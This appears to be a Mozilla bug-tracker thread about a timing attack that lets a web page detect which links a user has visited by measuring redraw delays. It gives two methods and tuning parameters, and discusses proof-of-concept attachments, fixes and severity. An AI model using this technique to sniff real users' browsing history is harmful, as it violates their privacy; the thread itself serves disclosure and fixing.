It's possible for a web page to tell whether a link is visited by detecting the redraw that occurs when the link colour changes. There are two basic methods that work:

Method 1: Place a (large) number of <a> elements on the web page, all with the same href. Firefox will first draw the elements in their 'unvisited' state and fire off an async DB query to check whether the href is in history. If the link is visited, the browser will redraw the elements as :visited.

Method 2: Place a (large) number of <a> elements on the web page, with hrefs we know aren't visited. Then update the hrefs to point to a URL we want to check. Firefox will fire off an async DB query to check whether the new URL is in history. If the URL is visited, the <a> elements will be redrawn as :visited.

How to detect the redraw: After creating or updating the links using method 1 or 2, the web page calls requestAnimationFrame repeatedly to time how long the subsequent frames take to draw. By using a large number of links and by making the links slow to draw (e.g. by setting a large text-shadow), the redraw (if it occurs) is delayed until 2-3 frames after the links are first drawn and takes longer than 16ms, so it is detectable. There seems to be a bit of a race condition here: if the DB query comes back before the links are drawn, they only need to be drawn once, so no redraw occurs.

A PoC that uses method 1 is attached. It repeatedly cycles through a number of URLs. For each URL it draws a number of <a> elements, then uses requestAnimationFrame to time the next 5 frames. Usually the first two frames are involved in rendering the links; a redraw then occurs around the 3rd or 4th frame if the link is visited. The PoC treats more than 2 'slow' frames as indicating a visited link. The PoC lets you tweak some parameters, which may be necessary depending on the speed of your computer (history size may be a factor too).
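The slow-frame heuristic described above can be sketched as a small pure function plus browser glue. This is an illustrative reconstruction, not the attached PoC; the function name, the 16ms threshold, and the ">2 slow frames" cutoff are taken from the description above.

```javascript
// One frame's budget at 60Hz; a frame that takes longer than this is "slow".
const FRAME_BUDGET_MS = 16;

// The PoC's heuristic: the first couple of frames are always slow (initial
// paint of the text-shadow-heavy links); a :visited redraw adds extra slow
// frames around the 3rd or 4th, so more than 2 slow frames => "visited".
function looksVisited(frameDurations) {
  const slow = frameDurations.filter((d) => d > FRAME_BUDGET_MS).length;
  return slow > 2;
}

// In the browser, the durations would be collected with requestAnimationFrame:
//
//   let last = performance.now();
//   const durations = [];
//   function tick(now) {
//     durations.push(now - last);
//     last = now;
//     if (durations.length < 5) requestAnimationFrame(tick);
//     else report(looksVisited(durations));
//   }
//   requestAnimationFrame(tick);

console.log(looksVisited([30, 25, 28, 4, 3])); // three slow frames -> true
console.log(looksVisited([30, 25, 4, 3, 2]));  // only the initial paint -> false
```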
The following values worked for me on different machines:

FF21, slower PC - Shadow: 1px 1px 50px, Links: 50, Link Length: 8
FF Nightly, slower PC - Shadow: (empty), Links: 350, Link Length: 1
FF21, faster PC - Shadow: 1px 1px 50px, Links: 550, Link Length: 1
FF Nightly, faster PC - Shadow: (empty), Links: 2000, Link Length: 1

Potential fixes:

Method 1 could be prevented by always redrawing a link even if it hasn't been visited. Chrome seems to wait for the history result to come back before drawing the link, so links are never redrawn.

Method 2 could be prevented by not updating a link's visited flag after it's first created, even if the href changes. Both Chrome and IE seem to do this (not sure if it's to prevent this attack).
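Method 2 depends on starting from hrefs that are guaranteed not to be in history, so the links first paint in the :link state. A minimal sketch of generating such baseline URLs (the nonce scheme and the example.invalid host are assumptions for illustration, not taken from the PoC):

```javascript
// Build n baseline hrefs that cannot plausibly be in the browser's history:
// a random nonce in the path makes each URL unique to this page load.
function makeUnvisitedHrefs(n) {
  const hrefs = [];
  for (let i = 0; i < n; i++) {
    const nonce = Math.random().toString(36).slice(2);
    hrefs.push(`https://example.invalid/never-visited/${nonce}-${i}`);
  }
  return hrefs;
}

// In the browser, the attack would create <a> elements with these hrefs,
// let them paint as :link, then swap every href to the probe URL:
//
//   for (const a of document.querySelectorAll('a.probe')) {
//     a.href = probeUrl; // the URL whose visited state we want to test
//   }

const hrefs = makeUnvisitedHrefs(3);
console.log(hrefs.length);        // 3
console.log(new Set(hrefs).size); // 3 (all distinct)
```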
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: privacy, sec-low
Attachment #764094 - Attachment mime type: text/plain → text/html
Apologies, the original PoC was broken. Correct version attached.
Attachment #764094 - Attachment is obsolete: true
I will be talking about this issue and similar ones in IE and Chrome next month at Black Hat. This is rated as low impact and I don't believe that disclosing it will put users at any significant risk. It's effectively equivalent to the CSS history sniffing attack that was present in all browsers for over 10 years, though being a timing attack it is not as speedy as the original technique and its accuracy is dependent on how much load a machine is under.
I think fixing bug 557579 would fix this.
probably time to open up this bug after Paul's talk at Black Hat 2013
Depends on: 557579
I believe this may be related to a bug I previously reported: https://bugzilla.mozilla.org/show_bug.cgi?id=773338
Attachment #765286 - Attachment mime type: text/plain → text/html
This is a more reliable proof-of-concept for modern machines. It works mostly reliably for me on both Firefox (release and aurora) and Chrome (release and canary), on both my Mac machine and my Windows machine.
dveditz, I wonder why you marked this as sec-low. It seems to me that, to avoid this kind of sniffing, we have added great complexity to our style computation code. Issues like this simply make those efforts meaningless.
When this was filed we weren't returning a high resolution timer in requestAnimationFrame(), and the original PoC was slower and less reliable. Fixing bug 557579 doesn't seem like it would add a lot more complexity. Would it not be sufficient?
Keywords: sec-low → sec-moderate
(In reply to Daniel Veditz [:dveditz] from comment #8)
> When this was filed we weren't returning a high resolution timer in
> requestAnimationFrame(), and the original PoC was slower and less reliable.

OK, that makes sense. Now it is reasonably reliable and fast.

> Fixing bug 557579 doesn't seem like it would add a lot more complexity.
> Would it not be sufficient?

I meant that we have already added a lot of complexity, and those efforts become meaningless once a new hole is found. So we should fix every new hole as soon as possible, or, if we think this privacy issue is not so important, we should just remove that complexity.

FWIW, conceptually, I don't think bug 557579 could fix this issue, because it seems to me that if the style data is not actually changed, no repaint would be triggered.

I remember dbaron mentioned during TPAC that there was a plan to only show visited state if the user has visited the URL from the given origin. I believe if we do that, all similar holes would be completely closed, and we could remove all the complexity for :visited. dbaron, do we still have that plan? And is there a bug number for it?
Seconding comment #9.
(In reply to Xidorn Quan [:xidorn] UTC+10 from comment #9)
> I remember dbaron mentioned during TPAC that there was a plan to only show
> visited state if the user has visited the url from the given origin. I
> believe if we do that, all similiar holes would be completely closed, and we
> could remove all complexities for :visited.
>
> dbaron, do we still have that plan? and is there any bug number for that?

That bug is now bug 1398414.
(In reply to Xidorn Quan [:xidorn] UTC+11 from comment #6)
> Created attachment 8687620 [details]
> more reliable proof-of-concept
>
> This is a more reliable proof-of-concept for modern machines. It works
> mostly reliably for me on both Firefox (release and aurora) and Chrome
> (release and canary), on both my Mac machine and my Windows machine.

In Firefox 52esr this proof-of-concept returns very different test values for visited and unvisited links. In Firefox 63, the test and base values are the same in nearly every case for me. Is this due to timing-related mitigations/fixes that resolve this particular issue, or is it not running correctly?

Note: I copied it to my hosting to bypass the CSP here, just in case: https://www.jeffersonscher.com/temp/history-sniffing.html